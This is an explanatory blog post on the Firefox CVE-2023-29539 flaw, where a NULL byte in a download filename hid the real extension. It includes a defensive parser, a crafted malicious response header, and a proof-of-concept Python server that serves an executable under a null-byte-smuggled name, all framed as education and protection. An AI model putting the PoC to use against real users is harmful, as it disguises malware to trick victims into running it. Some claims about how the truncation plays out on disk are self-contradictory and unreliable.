Web browsers do a lot of things to keep us safe. Sometimes, though, bugs slip through and create problems. In early 2023, Mozilla found a vulnerability—tracked as CVE-2023-29539—in Firefox and related products. If a website sent a Content-Disposition header with a filename containing a NULL character (that is, \0), Firefox would chop off the filename at that spot. This bug could trick someone into downloading files with misleading names, making it easier for attackers to hide malware.

This post explains how this vulnerability works, why it’s dangerous, and how you can protect yourself.

What Is the Content-Disposition Header?

When you download a file from the internet, the server can suggest to your browser what filename to use with the Content-Disposition header. Here’s what it usually looks like:

Content-Disposition: attachment; filename="my-document.pdf"

Browsers read this header and set the filename so your downloaded file appears as my-document.pdf.

The Bug: NULL Character Truncation

The bug in CVE-2023-29539 occurs when the filename includes a NULL character. Here's the trick: many string-handling routines use the NULL character (\0) to mark the end of a string. If this character appeared inside a filename, Firefox treated everything after it as if it didn't exist.

Suppose a malicious server sends this header:

Content-Disposition: attachment; filename="safe-file.txt\0.exe"

In Firefox before version 112, the browser would ignore anything after the \0 and name the file safe-file.txt. But, on the disk, the full filename could actually be safe-file.txt.exe.

Why Is This a Problem?

Many operating systems show only what Firefox presents (like safe-file.txt), not the real file extension (such as .exe—an executable). An attacker could send a program disguised as a text file, and the user might open it, thinking it’s safe.

This trick is called a reflected file download attack—the attacker reflects malicious content right back at you, wrapped in a filename you wouldn’t suspect.
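To make the truncation concrete, here is an added Python example (written for this post, not Mozilla's parser) that models the pre-fix handling of the filename parameter beside a hardened version, plus a small helper a proxy or log pipeline could use to surface the suffix a vulnerable client would have hidden. The regular expression and the sample header strings are constructed assumptions.

```python
"""Models the CVE-2023-29539 filename truncation (constructed example)."""
import re
from typing import Optional

# Quoted filename= parameter; enough for the header shapes discussed in the post.
_FILENAME_RE = re.compile(r'filename\s*=\s*"([^"]*)"', re.IGNORECASE)


def parse_filename_truncating(header: str) -> Optional[str]:
    """Pre-fix behaviour: the value is handled like a C string, so the first
    NUL byte silently ends the name and everything after it is lost."""
    match = _FILENAME_RE.search(header)
    if not match:
        return None
    value = match.group(1)
    nul = value.find("\x00")
    return value if nul < 0 else value[:nul]


def parse_filename_strict(header: str) -> Optional[str]:
    """Hardened behaviour: a name containing NUL or any other control
    character is rejected outright instead of being cut short."""
    match = _FILENAME_RE.search(header)
    if not match:
        return None
    value = match.group(1)
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        return None
    return value


def hidden_suffix(header: str) -> Optional[str]:
    """Detection helper: returns the part of the name a truncating client
    would have hidden (everything after the first NUL), or None if clean."""
    match = _FILENAME_RE.search(header)
    if not match or "\x00" not in match.group(1):
        return None
    return match.group(1).split("\x00", 1)[1]


# Constructed sample headers mirroring the post's examples.
BENIGN = 'attachment; filename="my-document.pdf"'
MALICIOUS = 'attachment; filename="safe-file.txt\x00.exe"'

if __name__ == "__main__":
    for hdr in (BENIGN, MALICIOUS):
        print(repr(parse_filename_truncating(hdr)),
              repr(parse_filename_strict(hdr)),
              repr(hidden_suffix(hdr)))
```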

A Simple Exploit Example

Let’s see what an attacker might do in practice.

Server sends:

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="important-info.txt\0.exe"

[...actual EXE file binary...]

- User saves it, maybe thinking it's just a text file.

- When they double-click, it runs the executable malware as important-info.txt.exe (on Windows systems where extensions are hidden by default).

Here's a quick Python script for a proof-of-concept (educational purposes only):

from http.server import BaseHTTPRequestHandler, HTTPServer

class ExploitHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-Type', 'application/octet-stream')
        # Inject NULL (\x00) in header (will need to encode properly for real test)
        self.send_header('Content-Disposition', 'attachment; filename="test.txt\x00.exe"')
        self.end_headers()
        # Body is whatever file sits next to the script; closed after reading
        with open("malicious.exe", "rb") as payload:
            self.wfile.write(payload.read())

# Port 800 as in the original post; ports below 1024 need elevated privileges on Unix-like systems
httpd = HTTPServer(('localhost', 800), ExploitHandler)
print("Serving malicious file on http://localhost:800...")
httpd.serve_forever()

Note: Browsers or servers may block null bytes, so this is here to illustrate the concept.

What Makes This Exploit Dangerous?

- Deceptive filenames: Users see safe.png or info.txt but are actually saving an EXE or other malware.

- Triggers user trust: Victims are more likely to open files that look harmless.

- Cross-platform: While most dangerous on Windows, it could affect other systems that mishandle NULLs.

Fixed In

- Firefox 112 Release Notes
- Firefox ESR 102.10 Release Notes
- Thunderbird 102.10 Release Notes

Official References

- Mozilla Security Advisory CVE-2023-29539
- Mozilla Bugzilla Bug 1824291
- Detailed CVE Description

How to Protect Yourself

- Update your browser: Make sure you use Firefox 112 or later (or other patched releases).

- Watch out for weird downloads: Even "safe" filenames may hide malware. Always double-check files before opening.

- Show hidden file extensions: On Windows, enable the display of file extensions to reveal real file types.

- Be aware of social engineering: Don't trust files just because of the name—look at the source and be cautious.

In Summary

CVE-2023-29539 allowed a single NULL character in a file name to turn an ordinary browser feature into a dangerous exploit, enabling attackers to hide harmful files behind innocent-looking names. Always keep browsers up to date and stay alert for tricks like these.

Timeline

Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/21/2023 15:33:00 UTC